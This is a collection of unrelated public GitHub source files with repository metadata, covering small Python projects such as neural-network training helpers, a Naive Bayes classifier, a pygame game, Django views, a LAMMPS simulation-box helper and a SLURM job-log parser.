1) % pred_period == 0:\n print('epoch %d, perplexity %f, time %.2f sec' % (\n epoch + 1, perplexity, time.time() - start))\n for prefix in prefixes:\n print(' -', predict_rnn_pytorch(\n prefix, pred_len, model, vocab_size, device, idx_to_char,\n char_to_idx))\n\n# 本函数已保存在d2lzh_pytorch包中方便以后使用\ndef read_imdb(folder='train', data_root=\"Datasets/aclImdb\"): \n data = []\n for label in ['pos', 'neg']:\n folder_name = os.path.join(data_root, folder, label)\n for file in os.listdir(folder_name):\n with open(os.path.join(folder_name, file), 'rb') as f:\n review = f.read().decode('utf-8').replace('\\n', '').lower()\n data.append([review, 1 if label == 'pos' else 0])\n random.shuffle(data)\n return data\n\n## Split sentences to tokens.\n## data: [[review_str, label_num]..]\ndef get_tokenized_imdb(data):\n def tokenizer(text):\n return [tok.lower() for tok in text.split(' ')]\n return [tokenizer(review) for review, _ in data]\n\ndef get_vocab_imdb(data):\n tokenized_data = get_tokenized_imdb(data)\n counter = collections.Counter([tk for st in tokenized_data for tk in st])\n return Vocab.Vocab(counter, min_freq=5) # Don't use word that num < 5.\n\ndef preprocess_imdb(data, vocab, max_length=500):\n max_l = max_length # 将每条评论通过截断或者补0,使得长度变成500\n\n def pad(x):\n return x[:max_l] if len(x) > max_l else x + [0] * (max_l - len(x))\n\n tokenized_data = get_tokenized_imdb(data)\n features = torch.tensor([pad([vocab.stoi[word] \n for word in words]) \n for words in tokenized_data])\n labels = torch.tensor([score for _, score in data])\n return features, labels\n\ndef load_pretrained_embedding(words, pretrained_vocab):\n \"\"\"从预训练好的vocab中提取出words对应的词向量\"\"\"\n embed = torch.zeros(len(words), pretrained_vocab.vectors[0].shape[0]) # 初始化为0\n for i, word in enumerate(words):\n try:\n idx = pretrained_vocab.stoi[word]\n embed[i, :] = pretrained_vocab.vectors[idx]\n except KeyError:\n continue\n\n return embed\n\ndef 
predict_sentiment(net, vocab, sentence):\n \"\"\"sentence是词语的列表\"\"\"\n device = list(net.parameters())[0].device\n sentence = torch.tensor([vocab.stoi[word] for word in sentence], device=device)\n label = torch.argmax(net(sentence.view((1, -1))), dim=1)\n return 'positive' if label.item() == 1 else 'negative'\n\ndef train(train_iter, test_iter, net, loss, optimizer, device, num_epochs):\n net = net.to(device)\n print(\"training on\", device)\n batch_count = 0\n for epoch in range(num_epochs):\n train_l_sum, train_acc_sum, n, start = 0.0, 0.0, 0, time.time()\n for X, y in train_iter:\n X = X.to(device)\n y = y.to(device)\n y_hat = net(X)\n l = loss(y_hat, y) \n optimizer.zero_grad()\n l.backward()\n optimizer.step()\n train_l_sum += l.cpu().item()\n train_acc_sum += (y_hat.argmax(dim=1) == y).sum().cpu().item()\n n += y.shape[0]\n batch_count += 1\n test_acc = evaluate_accuracy(test_iter, net)\n print('epoch %d, loss %.4f, train acc %.3f, test acc %.3f, time %.1f sec'\n % (epoch + 1, train_l_sum / batch_count, train_acc_sum / n, test_acc, time.time() - start))","repo_name":"czqmike/StudyNote","sub_path":"PyTorch/d2lzh_pytorch.py","file_name":"d2lzh_pytorch.py","file_ext":"py","file_size_in_byte":19643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40145609007","text":"### JHL Development Robot Coffee Barista\n### Learning In Python Part 3\n\nbusiness = \"Jacks Coffee House\" ## Name Of The Buisness\n\nprice = 5 ## Price Of Each Coffee (All Coffees Are The Same Price Currently)\n\nmenu = \"Black Coffee, Espresso, Light and Sweet,\\n\" + \"Ice Coffee, and Cappucino\" ## Items Listed On Menu\n\nprint(\"Hello Welcome To \" + business + \"!!!\")\n\nprint(\"Thank you so much for coming in today!!!\")\n\nname = input(\"What is your name?\\n\") ## Persons Name\n\nif name == \"Ben\": ## Ben was banned from my coffee shop \n print(\"You are banned from \" + business + \" we will not serve you. \" + \n \"Please leave!!!\") ## This is the message they will recieve if they try to enter (Ben)\n exit()\nelse:\n print(\"Nice to meet you \" + name + \"!!!\" +\n \" Thank you for coming in today!!!\")\n\norder = input(\"What Would You Like To Order?\\n\" +\n \"This Is What We Have On Our Menu For Today:\\n\" + menu + \"\\n\")\n\nquantity = input(\"How much \" + order + \" Would you like?\\n\")\n\ntotal = price * int(quantity)\n\nprint(\"Sounds great \" + name + \" Your total is going to be \" + \"$\" +\n str(total) + \"\\n\" + \"we will get your \" + quantity + \" \" + order +\n \" right up for you!!!\" +\n \" We will call you to the register when your \\n\" + quantity + \" \" +\n order + \" is ready!!!\")\n\nprint(\"Hey \" + name + \" Your \" + quantity + \" \" + order +\n \" is ready at the counter!!!\\n\" + \"Thank you for choosing \" + business +\n \"!!!\\n\" + \"Have a good day, and we hope to see you soon!!!\")\n","repo_name":"JackLuberto/Python-Barista-Bot3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36488723565","text":"#! /usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n# USAGE sript genelist.txt annotab.csv\n# v 05/08/2014\n# This script pulls out the entries from the banana gene annotation table based on a list of according banana gene names. 
\n\nimport os as os\nimport sys\n\n#genelist = open('02_get_common_gene_seq/sorted_genelist.txt','r')\n#MACUanno = open('00D_DB/banana_genefunct_biomart.txt','r')\n\n \n\n\ngenelist = open(sys.argv[1],'r')\nMACUanno = open(sys.argv[2],'r')\ngeneanno = open(\"parselength_mitoch_28oct.csv\",'a')\n\n#element=MACUanno.readlines().rsplit()\n#gene=genelist.readline().rstrip(\"\\n\")\n#element=element.split(',')\nrows=[]\nlist_name=[]\n\nfor line in MACUanno:\n rows.append(line)\n list_name.append(line.rsplit(',')[0])\n\n\nfor i in genelist:\n j=i.rstrip('\\n')\n marker=0\n while (list_name[marker:].count(j)>0): \n index_g=list_name[marker:].index(j)\n geneanno.write(rows[marker+index_g])\n marker+=index_g+1\n ","repo_name":"JeannineM/MarkerDev","sub_path":"parseanno.py","file_name":"parseanno.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22481411966","text":"class NaiveBayesClassifier:\n\n\tdef __init__(self, laplace = True):\n\t\tself.laplace = laplace\n\n\tdef fit(self, X, y, categorical_features = None, numerical_features = None, labels = (0, 1)):\n\t\tself.label_dict = {i : y[y == i].shape[0]/y.shape[0] for i in labels}\n\t\tself.unique_val = dict()\n\t\tself.prob_dict = dict()\n\n\t\tif categorical_features is None:\n\t\t\tcategorical_prob = dict()\n\t\telse:\n\t\t\tcategorical_prob = dict()\n\t\t\tfor i in categorical_features:\n\t\t\t\tcategorical_prob.setdefault(i, dict())\n\t\t\t\tcol_i_prob = dict()\n\t\t\t\tcol_i = X[:, i]\n\t\t\t\tself.unique_val.setdefault(i, 0)\n\t\t\t\tself.unique_val[i] = np.unique(col_i).shape[0]\n\t\t\t\tfor x in np.unique(col_i):\n\t\t\t\t\tcol_i_prob.setdefault(x, dict())\n\t\t\t\t\tif self.laplace:\n\t\t\t\t\t\tcol_i_prob[x] = {\n\t\t\t\t\t\t\tj : (np.sum((col_i == x) & (y == j)) + 1)/(np.sum(y == j) + self.unique_val[i])\\\n\t\t\t\t\t\t\tfor j in labels\n\t\t\t\t\t\t}\n\t\t\t\t\telse:\n\t\t\t\t\t\tcol_i_prob[x] = {\n\t\t\t\t\t\t\tj : np.sum((col_i == x) & (y == j))/np.sum(y == j) for j in labels\n\t\t\t\t\t\t}\n\t\t\t\tcategorical_prob[i] = col_i_prob\n\n\t\tif numerical_features is None:\n\t\t\tnumerical_prob = dict()\n\t\telse:\n\t\t\tnumerical_prob = dict()\n\t\t\tfor i in numerical_features:\n\t\t\t\tcol_i = X[:, i]\n\t\t\t\tnumerical_prob.setdefault(i, dict())\n\t\t\t\tfor j in labels:\n\t\t\t\t\tmean, std = (col_i[y == j]).mean(), (col_i[y == j]).std(ddof = 1)\n\t\t\t\t\tnumerical_prob[i][j] = (mean, std)\n\n\t\tself.prob_dict.update(categorical_prob)\n\t\tself.prob_dict.update(numerical_prob)\n\n\t\tself.numerical = numerical_features\n\t\tself.categorical = categorical_features\n\t\tself.labels = labels\n\n\t\treturn self\n\tdef predict(self, X):\n\t\ty_predict = []\n\n\t\tfor x in X:\n\t\t\tpredict_value = None\n\t\t\tprob_max = -1\n\t\t\tfor label in self.labels:\n\t\t\t\tprobs = []\n\n\t\t\t\tif self.categorical is not None:\n\t\t\t\t\tfor categorical_col in self.categorical:\n\t\t\t\t\t\tif categorical_col in self.prob_dict.keys():\n\t\t\t\t\t\t\tif x[categorical_col] in self.prob_dict[categorical_col].keys():\n\t\t\t\t\t\t\t\tprobs.append(self.prob_dict[categorical_col][x[categorical_col]][label])\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tprobs.append(1/self.unique_val[categorical_col])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tprobs.append(1/self.unique_val[categorical_col]) \n\n\t\t\t\tif self.numerical is not None:\n\t\t\t\t\tfor numerical_col in self.numerical:\n\t\t\t\t\t\tmean, std = self.prob_dict[numerical_col][label]\n\t\t\t\t\t\tdensity 
= 1/(std * np.sqrt(2*np.pi)) * np.exp(-(x[numerical_col] - mean)**2/(2 * std**2)) # Gaussian class-conditional density\n\t\t\t\t\t\tprobs.append(density)\n\n\t\t\t\tprob_label = self.label_dict[label] * np.cumprod(probs)[-1]\n\t\t\t\tif prob_label > prob_max:\n\t\t\t\t\tpredict_value, prob_max = label, prob_label\n\t\t\ty_predict.append(predict_value)\n\t\treturn np.array(y_predict)\n","repo_name":"PhuThanh-Nguyen/Introduction-to-Machine-Learning-Coursework","sub_path":"Code snippet/NaiveBayesClassifier.py","file_name":"NaiveBayesClassifier.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38434976140","text":"import os\n\nfrom contextlib import contextmanager\n\nfrom .filepath import FilePath\n\n\n@contextmanager\ndef working_directory(path: FilePath):\n    current = os.getcwd()\n\n    try:\n        yield os.chdir(path)\n    finally:\n        os.chdir(current)\n\n\ncd = working_directory\n\n\ndef ensure_directory(filepath: FilePath):\n    directory = os.path.dirname(filepath)\n\n    os.makedirs(directory, exist_ok=True)\n\n    return directory\n","repo_name":"swp-berlin/webmonitor","sub_path":"swp/utils/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"42818855692","text":"import pygame\nfrom pygame import init, display, time, font, mixer, image, key\nfrom random import randrange\n\ninit()\n\nscreen = display.set_mode((500, 1000))\nclock = time.Clock()\n\nscoreFont = font.Font(\"fonts/Rubik-weight.ttf\", 25)\ngameoverFont = font.Font(\"fonts/Rubik-weight.ttf\", 75)\nrestartFont = font.Font(\"fonts/Rubik-weight.ttf\", 30)\nkeyboardcommandFont = font.Font(\"fonts/Rubik-weight.ttf\", 20)\n\nmixer.music.load(\"music/Music.wav\")\nmixer.music.play(-1)\nmixer.music.set_volume(0.5)\n\nbackground = image.load(\"images/Background.png\")\n\nscore, highscore = 0, 0\ngameover = False\ncan_move = True\n\nplayerImage = image.load(\"images/Player.png\")\nplayerX, playerY = 225, 475\nplayerWidth, playerHeight = 50, 50\nplayerSpeed = 10\n\nenemyImage = image.load(\"images/Enemy.png\")\nenemyX, enemyY = 0, randrange(1000)\nenemyWidth, enemyHeight = 30, 30\nenemySpeed = 20\n\nis_running = True\nwhile is_running:\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            is_running = False\n\n    pressed = key.get_pressed()\n    if can_move:\n        if pressed[pygame.K_LEFT]: # Move Left\n            playerX -= playerSpeed\n        elif pressed[pygame.K_RIGHT]: # Move Right\n            playerX += playerSpeed\n\n    if pressed[pygame.K_SPACE] and gameover: # Restart\n        playerX, playerY = 225, 475\n        can_move = True\n\n    if pressed[pygame.K_ESCAPE]: # Quit\n        pygame.quit()\n\n    enemyY += enemySpeed # Spawn-Random-Enemy\n    if enemyY >= 1000:\n        enemyX, enemyY = randrange(480), 0\n\n    if score % 200 == 0: # Enemy-Speed-Increase\n        enemySpeed += 0.5\n\n    playerX = max(0, min(playerX, 450)) # Player-Screen-Barrier\n\n    screen.blit(background, (0, 0))\n    enemy = screen.blit(enemyImage, (enemyX, enemyY, enemyWidth, enemyHeight))\n    player = screen.blit(playerImage, (playerX, playerY, playerWidth, playerHeight))\n\n    scoretext = scoreFont.render(\"Score: \" + str(score), 1, (255, 255, 255))\n    screen.blit(scoretext, (20, 20))\n    highscoretext = scoreFont.render(\"Highscore: \" + str(highscore), 1, (255, 255, 255))\n    screen.blit(highscoretext, (20, 60))\n    score += 1\n\n    keyboardlefttext = keyboardcommandFont.render(\"Movement-Left = Key LEFT\", 1, (255, 255, 255))\n    screen.blit(keyboardlefttext, (20, 
930))\n keyboardrighttext = keyboardcommandFont.render(\"Movement-Right = Key RIGHT\", 1, (255, 255, 255))\n screen.blit(keyboardrighttext, (20, 960))\n\n if player.colliderect(enemy): # Player-Enemy-Collide\n gameover = True\n can_move = False\n playerX, playerY = 225, 515\n enemyX, enemyY = 235, 510\n enemySpeed = 20\n\n if score > highscore: # Set Highscore\n highscore = score\n score = 0\n\n gameovertext = gameoverFont.render(\"Game Over\", 1, (255, 75, 75))\n screen.blit(gameovertext, (60, 375))\n restarttext = restartFont.render(\"Press Space to restart\", 1, (255, 255, 255))\n screen.blit(restarttext, (95, 450))\n\n display.update()\n clock.tick(60)\n","repo_name":"JulianPlatz/Touch-Not-The-Square","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22392997052","text":"from django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\n\n\nclass PrivateViewMixin(object):\n @method_decorator(login_required)\n def dispatch(self, *args, **kwargs):\n return super().dispatch(*args, **kwargs)\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['is_on_private_page'] = True\n return context\n","repo_name":"despawnerer/thinkies","sub_path":"website/views/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20928270531","text":"# Given an array of positive integers arr, return the sum of all possible odd-length subarrays of arr.\n\n# A subarray is a contiguous subsequence of the array.\n\n\nclass Solution:\n def sumOddLengthSubarrays(self, arr: List[int]) -> int:\n res = 0\n for sublen in range(1, len(arr) + 1, 2):\n idx = 0\n while idx < len(arr) - sublen + 1:\n res += sum(arr[idx : idx + sublen])\n idx += 1\n\n return res\n","repo_name":"Antony-evm/Leet_Code_Solutions","sub_path":"Solutions/1588. Sum of All Odd Length Subarrays/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72447028887","text":"#Ejercicio 11\n#Defina la función porcentaje la cual recibe como parámetro\n#una lista de números flotantes l y un número entero p. La función\n#retorna como resultado el porcentaje p de la suma de los elementos de\n#l. 
La función recibe como parámetro por defecto la lista vacía.\n\n\ndef porcentaje(lista, p):\n\tsuma = 0\n\tfor i in lista:\n\t\tsuma += i\n\treturn ((suma * p) / 100)\n\nloop = True\nl = []\nwhile(loop):\n\ttry:\n\t\tprint(\"Ingrese un flotante para agregar a la lista, ingrese 0 para terminar de agregar\")\n\t\tflotante = float(input())\n\t\tif(flotante == 0):\n\t\t\tloop = False\n\t\telse:\n\t\t\tl.append(flotante)\n\texcept ValueError:\n\t\tprint(\"El dato ingresado no es valido, intentelo de nuevo!\")\n\n\nloop = True\nwhile(loop):\n\ttry:\n\t\tprint(\"Ingrese el porcentaje a calcular a la suma de los numeros de la lista ingresada:\")\n\t\tp = int(input())\n\t\tloop = False\n\texcept ValueError:\n\t\tprint(\"El porcentaje ingresado no es un entero, intentelo de nuevo!\")\n\nprint(\"Este es el\", p,\"% de la suma de los numeros de la lista ingresada:\")\nprint(porcentaje(l, p))\n\n","repo_name":"Kindue/Python-Argentina-Programa","sub_path":"Unidad 4/4.4 Funciones/Actividades de afianzamiento/Ejercicio11.py","file_name":"Ejercicio11.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18871927101","text":"import os, glob, telnetlib, time\n\nCAMINHO = \"/home/admin/deploy\"\nHOST = \"127.0.0.1\" # connects to the idempiere OSGi console via localhost\nPORT = 12612 # OSGi console port\nTIMEOUT = 2\n\n\ntn = telnetlib.Telnet(HOST, PORT, TIMEOUT)\n\n# print(\"Open\")\n# tn.open(HOST, PORT)\nprint(\"ls\")\ntn.write(b\"ls\\n\") # telnetlib expects bytes; the newline submits the command\nprint(\"exit\")\ntn.write(b\"exit\\n\")\n\ntn.close()\nprint('Done')\n","repo_name":"jbiason/random","sub_path":"telinet.py","file_name":"telinet.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9550493286","text":"from hdx.hdx_configuration import Configuration\nfrom hdx.data.dataset import Dataset\nfrom hdx.utilities.dictandlist import write_list_to_csv\n\nConfiguration.create(hdx_site='prod', user_agent='A_Quick_Example', hdx_read_only=True)\n# https://data.humdata.org/api/action/package_search?q=*:*&fq=metadata_created:[2018-07-01T00:00:00.000Z%20TO%202018-09-30T00:00:00.000Z]\nrows = list()\ndatasets = Dataset.search_in_hdx(fq='metadata_created:[2019-04-01T00:00:00.000Z TO 2019-06-30T00:00:00.000Z]')\nfor dataset in datasets:\n    resources = dataset.resources\n    if len(resources) > 0:\n        url = resources[0]['url']\n    else:\n        url = ''\n    rows.append([dataset['name'], dataset['metadata_created'], url, dataset['organization']['name']])\nwrite_list_to_csv(rows, 'createddatasets.csv', ['name', 'created', 'url', 'orgname'])","repo_name":"mcarans/scratch","sub_path":"get_new_datasets.py","file_name":"get_new_datasets.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33147463806","text":"from django.urls import path, include\nfrom . 
import views\n\n\napp_name = 'forum'\nurlpatterns = [\n path('', views.home, name=\"home\"),\n path('forum//themes//page=', views.topic_messages, name=\"detail\"),\n path('forum//themes/page=', views.topics, name=\"topic\"),\n path('accounts/', include('django.contrib.auth.urls')),\n path('accounts/register/', views.register, name='register'),\n path('forum//themes/create/', views.create_topic, name='create_topic'),\n path('forum/page=', views.themes, name=\"theme\"),\n path('forum/create', views.create_theme, name='create_theme'),\n]","repo_name":"Rikucode/Forum","sub_path":"myproject/forum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28449408392","text":"from simphony.api import CUBA\n\n\ndef get_box(particle_data_containers,\n command_format=False,\n change_existing=False):\n \"\"\" Get simulation box commands\n\n Using CUBA.VECTOR and CUBA.ORIGIN, return the\n string used by LAMMPS to define the simulation box in\n the LAMMPS data file or as a command.\n\n Currently the box vectors (and origin) have to be\n the same for each particle container.\n\n Parameters:\n -----------\n particle_data_containers: collection of DataContainer\n list of containers of data containers from particles\n command_format: boolean\n if command format is true, then box command suitable\n for lammps-command is returned. Otherwise, the\n string returned is suitable for LAMMPS data file.\n change_existing: boolean\n if true, the lammps-command suitable for changing the\n simulation box is returned\n \"\"\"\n origin = None\n vectors = None\n\n for dc in particle_data_containers:\n # find box vectors (and origin) and ensure\n # that they are the same for each particle container\n if CUBA.VECTOR in dc:\n if (vectors and\n vectors != dc[CUBA.VECTOR]):\n raise RuntimeError(\n \"Box vectors of each Particles need to match\")\n vectors = dc[CUBA.VECTOR]\n else:\n raise RuntimeError(\"CUBA.VECTOR was not set\")\n if CUBA.ORIGIN in dc:\n if origin and origin != dc[CUBA.ORIGIN]:\n raise RuntimeError(\n \"Box origin of each Particles need to match\")\n origin = dc[CUBA.ORIGIN]\n\n # origin is optional\n if not origin:\n origin = (0.0, 0.0, 0.0)\n\n # Note: For LAMMPS we can define a orthogonal simulation\n # or non-orthogonal simulation box. For the non-orthogonal\n # simulation box, the lammps doc states the following:\n # \"a must lie on the positive x axis. b must lie in\n # the xy plane, with strictly positive y component. c may\n # have any orientation with strictly positive z component.\n # The requirement that a, b, and c have strictly positive\n # x, y, and z components, respectively, ensures that a, b,\n # and c form a complete right-handed basis.\"\n\n if not vectors:\n raise RuntimeError(\"CUBA.VECTOR was not set\")\n else:\n _check_vectors(vectors)\n\n box_string = \"\"\n if command_format:\n if change_existing:\n box_string = _get_change_region_box_string()\n else:\n box_string = _get_command_region_box_string()\n else:\n if change_existing:\n RuntimeError(\"change existing is not supported for data file\")\n box_string = _get_data_file_box_string()\n\n return box_string.format(origin[0], vectors[0][0]+origin[0],\n origin[1], vectors[1][1]+origin[1],\n origin[2], vectors[2][2]+origin[2])\n\n\ndef _check_vectors(vectors):\n # TODO: currently only handling orthogonal simulation box\n # (where a must lie on positive x axis..) 
so only something\n # like the following is allowed: (x, 0, 0), (0, y, 0)\n # and (0, 0, z).\n for i, v in enumerate(vectors):\n for j, x in enumerate(v):\n if i != j and float(x) != 0.0:\n msg = (\"Box vectors must have the form \"\n \"(x, 0, 0), (0, y, 0) and (0, 0, z)\")\n raise RuntimeError(msg)\n\n\ndef _get_data_file_box_string():\n box = \"{:.16e} {:.16e} xlo xhi\\n\"\n box += \"{:.16e} {:.16e} ylo yhi\\n\"\n box += \"{:.16e} {:.16e} zlo zhi\\n\"\n return box\n\n\ndef _get_command_region_box_string():\n box = \"region box block {:.16e} {:.16e} \"\n box += \"{:.16e} {:.16e} \"\n box += \"{:.16e} {:.16e}\\n\"\n return box\n\n\ndef _get_change_region_box_string():\n box = \"change_box all x final {:.16e} {:.16e} \"\n box += \"y final {:.16e} {:.16e} \"\n box += \"z final {:.16e} {:.16e}\\n\"\n return box\n","repo_name":"simphony/simphony-lammps","sub_path":"simlammps/config/domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"37599580669","text":"def all_paths():\r\n #-----------------------------ADAPT THIS DIRECTORY TO YOUR SYSTEM---------------------------------------------------\r\n main_branch = r\"~/Desktop/CloudCrystal/predictor\"\r\n #-----------------------------ADAPT THIS DIRECTORY TO YOUR SYSTEM---------------------------------------------------\r\n \r\n data_and_scripts_location = {\r\n # data paths\r\n \"general_data_path\": main_branch + r\"/Data\",\r\n \"data_path\": main_branch + r\"/Data\",\r\n \"Data\": main_branch + r\"/Data\",\r\n #raw data path\r\n \"raw_data_path\": main_branch + r\"/Data/raw\",\r\n \"Data/raw\": main_branch + r\"/Data/raw\",\r\n #parsed data path\r\n \"parsed_data_path\": main_branch + r\"/Data/parsed\",\r\n \"Data/parsed\": main_branch + r\"/Data/parsed\",\r\n #python scripts path\r\n \"scripts_path\": main_branch + r\"/Lib\",\r\n \"Lib\": main_branch + r\"/Lib\",\r\n #path to keras models\r\n \"models_path\": main_branch + r\"/Models\",\r\n \"Models\": main_branch + r\"/Models\",\r\n #path of the forecasts\r\n \"forecasts_path\": main_branch + r\"/Forecasts\",\r\n \"Forecasts\": main_branch + r\"/Forecasts\",\r\n }\r\n return data_and_scripts_location\r\n\r\n\r\n\r\ndef convert_path(full_path):\r\n #make sure the path is OS indipendent\r\n from os.path import expanduser\r\n from os.path import join\r\n home = expanduser(\"~\")\r\n full_path_w=full_path.split(\"/\")\r\n conv_full_path = home\r\n for f in full_path_w[1:]:\r\n conv_full_path = join(conv_full_path,f)\r\n return conv_full_path\r\n\r\n\r\n\r\ndef parse_raw_data(rawdata_name_dot_csv):\r\n #-----------------------------------------------IMPORT TIME--------------------------------------------------------\r\n import time\r\n #-----------------------------------------------IMPORT TIME--------------------------------------------------------\r\n start_time = time.time()\r\n\r\n data_and_scripts_location = all_paths()\r\n raw_data_path = data_and_scripts_location[\"Data/raw\"]\r\n\r\n #-----------------------------------------------IMPORT PANDAS--------------------------------------------------------\r\n import pandas as pd\r\n #-----------------------------------------------IMPORT PANDAS--------------------------------------------------------\r\n DF = pd.read_csv(raw_data_path + \"/\" + rawdata_name_dot_csv , sep='|', low_memory = False)\r\n\r\n print(\"Start parsing the data...\")\r\n\r\n #print(DF.columns.values)\r\n featureNames = DF.columns.values\r\n 
numFeatures = len(DF.columns.values)\r\n\r\n requiredFeatures = ['Partition','ReqNodes','ReqCPUS','NNodes','Timelimit','Submit','Start','End','Eligible','QueueTime']\r\n\r\n out = set(featureNames).intersection(requiredFeatures)\r\n if (len(out)!=len(requiredFeatures)):\r\n missing = [feature for feature in requiredFeatures if feature not in featureNames]\r\n raise ValueError(\"The following Features: %s are missing (or mispelled) in the provided dataset\" % missing)\r\n\r\n workingDataset = DF.loc[:,requiredFeatures]\r\n\r\n # Convert q times to integers (in seconds)\r\n print(\"------------------------------------Parse the feature 'QueueTime'-------------------------------------\")\r\n QTseries = workingDataset.loc[:,\"QueueTime\"]\r\n # A better strategy to deal with non formatted time is needed to make the algorithm more robust\r\n ld = QTseries.str.contains(\"day\")\r\n if any(ld): \r\n print(\"special convertion from days is needed \\ndetecting number of days...\")\r\n QTdays = QTseries.loc[ld]\r\n days = []\r\n for day in QTdays:\r\n dayFormat = day.split(\" \")\r\n days.append(int(dayFormat[0])*24*60) #convert days into minutes\r\n #days.append(\"%i:00:00\"%dayValue)\r\n print(\"No. %i entries detected with unkown time format of type 'days' for qTimes.\"%ld.values.sum())\r\n QTseries.loc[ld] = days\r\n\r\n #convert to minutes and neglect the seconds to keep integer format\r\n QTseries.loc[~ld] = QTseries.loc[~ld].str.split(':').apply(lambda x: int(x[0]) * 60 + int(x[1]))\r\n print(\"-------------------------------------done-------------------------------------------------------------\")\r\n\r\n\r\n # Convert the time limits to integers (in seconds)\r\n print(\"------------------------------------Parse the feature 'Timelimit'-------------------------------------\")\r\n TLseries = workingDataset.loc[:,\"Timelimit\"]\r\n ltl_u = TLseries.str.contains(\"UNLIMITED\")\r\n ltl_p = TLseries.str.contains(\"Partition_Limit\")\r\n ltl_d = TLseries.str.contains(\"-\")\r\n ltd_up = (ltl_u | ltl_p)\r\n ltl_udp = (ltl_u | ltl_d | ltl_p)\r\n\r\n if any(ltl_p): \r\n print(\"No. %i entries of 'Partition_Limit' type detected. Partition_Limit will be converted into a large integer (~3 years)\"%ltl_p.values.sum())\r\n TLseries.loc[ltl_p] = int(10**8)\r\n\r\n\r\n if any(ltl_u): \r\n print(\"No. %i entries of 'UNLIMITED' type detected. 'UNLIMITED' time will be converted into a large integer (~3 years)\"%ltl_u.values.sum())\r\n TLseries.loc[ltl_u] = int(10**8)\r\n\r\n\r\n if any(ltl_d):\r\n print(\"No. %i entries expressed in days. 
These values will be converted in minutes.\"%ltl_d.values.sum())\r\n TLseries.loc[ltl_d] = TLseries.loc[ltl_d].str.replace('-',':')\r\n\r\n\r\n #-----------------------------------------------IMPORT NUMPY--------------------------------------------------------\r\n import numpy as np\r\n #-----------------------------------------------IMPORT NUMPY--------------------------------------------------------\r\n y=np.array(range(0,int(ltl_udp.size)))\r\n Zs = pd.Series([\"00:\"]*y[~ltl_udp.values].size, index=y[~ltl_udp.values])\r\n TLseries.loc[~ltl_udp] = Zs.str.cat(TLseries.loc[~ltl_udp])\r\n\r\n #convert to minutes and neglect the seconds\r\n TLseries.loc[~ltd_up] = TLseries.loc[~ltd_up].str.split(':').apply(lambda x: int(x[0]) * 24 * 60 + int(x[1]) * 60 + int(x[2]))\r\n print(\"-------------------------------------done-------------------------------------------------------------\")\r\n\r\n # Convert the submission time into two features (in seconds)\r\n print(\"------------------------------------Parse 'Submission time'-------------------------------------\")\r\n STseries = workingDataset.loc[:,\"Submit\"]\r\n\r\n STseries=STseries.str.replace('T',' ')\r\n STseries=pd.to_datetime(STseries) # this turns the data into pandas Timestamps\r\n print(\"...Converting submit date to weekday\")\r\n workingDataset[\"Weekday\"]=STseries.apply(lambda x: x.weekday())\r\n print(\"...Converting submit date to minutes within the day\")\r\n workingDataset[\"Dayminute\"]=STseries.apply(lambda x: x.hour*60+x.minute)\r\n\r\n # compute week number\r\n week_array_base=workingDataset[\"Weekday\"].values\r\n week_array = np.ones(len(week_array_base)+1)*week_array_base[0]\r\n week_array[1:] = workingDataset[\"Weekday\"].values\r\n new_array_diff=np.diff(week_array)\r\n l_nv = new_array_diff<0\r\n d_nv = 1*l_nv\r\n weeknumber = d_nv.cumsum()+1\r\n workingDataset[\"WeekNumber\"]=pd.Series(weeknumber)\r\n totalweeks = workingDataset[\"WeekNumber\"].values[-1]\r\n\r\n days_in_week=7\r\n workingDataset[\"sin(Weekday)\"]=STseries.apply(lambda x: np.sin(2*np.pi*x.weekday()/days_in_week))\r\n workingDataset[\"cos(Weekday)\"]=STseries.apply(lambda x: np.cos(2*np.pi*x.weekday()/days_in_week)) \r\n\r\n minutes_in_day = 24*60\r\n workingDataset[\"sin(Dayminute)\"]=STseries.apply(lambda x: np.sin(2*np.pi*(x.hour*60+x.minute)/minutes_in_day))\r\n workingDataset[\"cos(Dayminute)\"]=STseries.apply(lambda x: np.cos(2*np.pi*(x.hour*60+x.minute)/minutes_in_day)) \r\n\r\n cols = 